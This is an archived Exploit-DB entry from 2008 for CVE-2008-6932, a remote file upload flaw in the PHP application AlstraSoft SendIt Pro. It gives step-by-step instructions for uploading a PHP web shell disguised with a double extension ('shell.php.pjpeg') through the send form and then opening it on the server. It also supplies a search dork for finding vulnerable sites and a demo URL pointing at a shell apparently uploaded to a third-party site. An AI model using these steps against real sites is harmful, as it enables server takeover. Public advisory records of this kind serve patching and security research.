- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7101
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6932
- Дата публикации
- 2008-11-12
Код:
[~] AlstraSoft SendIt Pro Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 12.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork: "Powered by AlstraSoft SendIt Pro"
[~]
[~] my bug number now: 36
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------
Exploit:
you save your shell like this: shell.php.pjpeg
warning: filetype not php.jpeg
like this: filetype: php.pjpeg
after you go site
Recipients' e-mail address: write anything
Select file : select your_shell.php.pjpeg
Your e-mail address: email
Message to send to recipient : write anything
and click to send button after you see link and clik to that link
you go your_shell.php.pjpeg :
localhost/script/send/files/[id]shell.php.pjpeg
example for demo:
http://www.blizsoft.com/send/files/84019shell.php.pjpeg
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-12]- Источник
- www.exploit-db.com
